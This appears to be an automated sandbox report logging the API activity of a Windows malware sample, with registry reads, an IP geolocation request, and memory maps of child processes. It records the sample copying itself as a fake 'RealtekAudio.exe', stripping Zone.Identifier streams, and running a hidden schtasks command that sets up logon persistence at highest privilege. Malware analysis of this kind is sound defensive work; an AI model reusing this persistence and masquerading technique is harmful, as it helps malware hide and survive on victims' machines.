Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = CRH2YWU7 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = api.ipstack.com, address_out = 198.23.101.146, 158.85.167.221 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 198.23.101.146, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 204, size_out = 204 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = api.ipstack.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Inet Send HTTP Request headers = host: api.ipstack.com, connection: Keep-Alive, user-agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, url = api.ipstack.com/check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 966 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 966 True 1
Fn
Data
File Delete filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe:Zone.Identifier False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek, type = file_attributes False 2
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5, type = file_attributes True 1
Fn
File Get Info filename = C:\Users, type = file_attributes True 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Roaming\Realtek True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe, type = file_attributes False 1
Fn
File Copy source_filename = C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe, destination_filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe True 1
Fn
Process Create process_name = "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f, os_pid = 0xc88, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe:Zone.Identifier False 1
Fn
Process Create process_name = "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe", os_pid = 0xca0, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Thread 0xc08
17 6
Category Operation Information Success Count Logfile
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe True 1
Fn
Thread 0xc20
3 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 3
Fn
Thread 0xc28
52 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Module Load module_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll, base_address = 0x6a310000 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Get, address_out = 0x6a311b96 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Put, address_out = 0x6a311b7a True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Delete, address_out = 0x6a311bb5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Next, address_out = 0x6a311bf7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = Clone, address_out = 0x6a311aa2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Module Get Address module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Thread 0xc80
2 0
Category Operation Information Success Count Logfile
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #9: schtasks.exe
19 0
Information Value
ID #9
File Name c:\windows\system32\schtasks.exe
Command Line "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Local\Temp\JrsI6VAkyYDZ.exe" /rl HIGHEST /f
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:40, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
Information Value
PID 0xc88
Parent PID 0xbf4 (c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xC8C
0xC9C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory rw True False False -
locale.nls 0x00090000 0x000f6fff Memory Mapped File r False False False -
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory r True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory rw True False False -
pagefile_0x0000000000210000 0x00210000 0x002d7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e1fff Pagefile Backed Memory rw True False False -
schtasks.exe.mui 0x002f0000 0x00301fff Memory Mapped File rw False False False -
private_0x0000000000310000 0x00310000 0x00310fff Private Memory rw True False False -
private_0x0000000000320000 0x00320000 0x00320fff Private Memory rw True False False -
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory r True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory rw True False False -
pagefile_0x0000000000350000 0x00350000 0x00450fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x00460000 0x0072efff Memory Mapped File r False False False -
rpcss.dll 0x00730000 0x0078bfff Memory Mapped File r False False False -
private_0x0000000000730000 0x00730000 0x0090ffff Private Memory rw True False False -
pagefile_0x0000000000730000 0x00730000 0x0080efff Pagefile Backed Memory r True False False -
pagefile_0x0000000000810000 0x00810000 0x00810fff Pagefile Backed Memory r True False False -
private_0x00000000008d0000 0x008d0000 0x0090ffff Private Memory rw True False False -
private_0x0000000000a00000 0x00a00000 0x00a3ffff Private Memory rw True False False -
schtasks.exe 0x00f60000 0x00f8dfff Memory Mapped File rwx True False False -
pagefile_0x0000000000f90000 0x00f90000 0x01b8ffff Pagefile Backed Memory r True False False -
ktmw32.dll 0x734c0000 0x734c8fff Memory Mapped File rwx False False False -
taskschd.dll 0x739e0000 0x73a5cfff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Threads
Thread 0xc8c
19 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-08-10 04:09:34 (UTC) True 1
Fn
System Get Time type = Ticks, time = 154924 True 1
Fn
Module Get Handle module_name = c:\windows\system32\schtasks.exe, base_address = 0xf60000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
Module Load module_name = VERSION.dll, base_address = 0x748d0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoSizeW, address_out = 0x748d19d9 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = GetFileVersionInfoW, address_out = 0x748d19f4 True 1
Fn
Module Get Address module_name = c:\windows\system32\version.dll, function = VerQueryValueW, address_out = 0x748d1b51 True 1
Fn
Module Get Filename process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\system32\schtasks.exe, size = 260 True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-08-10 02:09:34 (Local Time) True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x76a0157a True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 83 True 1
Fn
Data
Process #10: taskeng.exe
0 0
Information Value
ID #10
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {7737867F-ACDD-43AC-B745-B8B549957EED} S-1-5-21-3785418085-2572485238-895829336-1000:CRH2YWU7\EEBsYm5:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Created Scheduled Job
Unmonitor End Time: 00:04:25, Reason: Self Terminated
Monitor Duration 00:02:45
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x58c
Parent PID 0x358 (Unknown)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA28
0x2A8
0x5E0
0x5A0
0x594
0x590
0xDE4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x00187fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory rw True False False -
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory rw True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory rw True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002f0fff Pagefile Backed Memory r True False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory rw True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory r True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory rw True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory rw True False False -
private_0x0000000000500000 0x00500000 0x0057ffff Private Memory rw True False False -
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory rw True False False -
pagefile_0x00000000005b0000 0x005b0000 0x009a2fff Pagefile Backed Memory r True False False -
private_0x00000000009e0000 0x009e0000 0x00a1ffff Private Memory rw True False False -
private_0x0000000000af0000 0x00af0000 0x00b2ffff Private Memory rw True False False -
sortdefault.nls 0x00b30000 0x00dfefff Memory Mapped File r False False False -
pagefile_0x0000000000e50000 0x00e50000 0x00f2efff Pagefile Backed Memory r True False False -
taskeng.exe 0x00f30000 0x00f5ffff Memory Mapped File rwx False False False -
pagefile_0x0000000000f60000 0x00f60000 0x01b5ffff Pagefile Backed Memory r True False False -
private_0x0000000001b80000 0x01b80000 0x01bbffff Private Memory rw True False False -
private_0x0000000001c10000 0x01c10000 0x01c4ffff Private Memory rw True False False -
private_0x0000000001d50000 0x01d50000 0x01d8ffff Private Memory rw True False False -
tschannel.dll 0x70500000 0x70507fff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
dwmapi.dll 0x73eb0000 0x73ec2fff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
